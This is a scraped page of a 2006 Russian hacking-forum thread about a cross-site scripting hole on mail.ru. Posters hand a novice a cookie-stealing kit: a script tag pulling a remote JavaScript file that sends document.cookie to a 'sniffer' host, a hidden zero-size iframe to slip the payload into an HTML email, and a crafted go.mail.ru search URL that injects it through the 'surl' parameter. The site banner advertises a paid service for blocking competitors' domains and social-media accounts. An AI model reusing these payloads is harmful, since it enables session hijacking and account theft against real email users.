Форум АНТИЧАТ - Xss на mail.ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Xss на mail.ru

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

01.06.2006, 17:22

em00s7

Участник форума

Регистрация: 02.05.2006

Сообщений: 193

Провел на форуме:
530613

Репутация: 25

Отправить сообщение для em00s7 с помощью ICQ

а активной у вас нету??

#12

06.06.2006, 16:43

Sirko

Новичок

Регистрация: 05.06.2006

Сообщений: 16

Провел на форуме:
37426

Репутация: 0

Цитата:

Green_Bear]Для ознакомления:
https://forum.antichat.ru/thread18719.html

Чтобы куки украсть достаточно в уязвимом параметре написать:

Код:

<srcipt src=http://site.ru/js.js></script>

Непонятно в каком параметре????

Цитата:

В самом файле js.js

Код:

img = new Image();
img.src = "http://sniffer/sn.php?"+document.cookie;

Это надо создать файл и положить на сервак где выполняются скрипты??

Цитата:

Этот способ хорош тем, что работает даже там, где фильтруються ковычки.

Зарегить сниффер можно на http://antichat.org/sniffer or http://s.netsec.ru/
Замаскировать линк можно http://loc.netsec.ru/
Но лучше делать в ифрейме, например

Код:

<iframe src="http://site.ru/?para=<script src=http://site.ru/js.js></script>" frameborder="0" widht="0" height="0">

И куда этот инфрейм вставлвть???
Толке не говорите в Ж....

#13

06.06.2006, 21:33

*Van*

Постоянный

Регистрация: 14.08.2005

Сообщений: 378

Провел на форуме:
670862

Репутация: 54

Отправить сообщение для *Van* с помощью ICQ

Цитата:

Сообщение от Sirko

Непонятно в каком параметре????

Например в данной xss уязвимый параметр surl

Код:

http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25  %20%20FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C%  2Burl%%20%20253D%2522www%2Edogcatalog%2Enet%252F%2  A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE%  %20%2025E7%25E4%25E0%25ED%25E8%25E5&surl=%3Cscript  src=http://site.ru/js.js%3E%3C/script%3E

Цитата:

Сообщение от Sirko

Это надо создать файл и положить на сервак где выполняются скрипты??

Да.

Цитата:

Сообщение от Sirko

И куда этот инфрейм вставлвть???
Толке не говорите в Ж....

В поле сообщения. Не забудь отослать в формате HTML.

#14

06.06.2006, 22:07

Sirko

Новичок

Регистрация: 05.06.2006

Сообщений: 16

Провел на форуме:
37426

Репутация: 0

Цитата:

http://go.mail.ru/search?lfilter=y&q...E%25E3%25E8%25 %20%20FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C% 2Burl%%20%20253D%2522www%2Edogcatalog%2Enet%252F%2 A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25 EE%25E2%2B%25F1%25EE% %20%2025E7%25E4%25E0%25ED%25E8%25E5&surl=%3Cscript src=http://site.ru/js.js%3E%3C/script%3E

А это куда???

#15

08.06.2006, 00:38

volone

Новичок

Регистрация: 06.06.2006

Сообщений: 24

Провел на форуме:
64563

Репутация: 11

Отправить сообщение для volone с помощью ICQ

а прокси обязательно использовать ?

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss черви и вирусы: сообщества уязвимых	Utochka	Чужие Статьи	3	28.08.2006 00:26
Mail.Ru и «Яндекс» официально объявили о сотрудничестве	•••™NO FEAR™•••	Мировые новости	1	17.01.2006 13:51

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход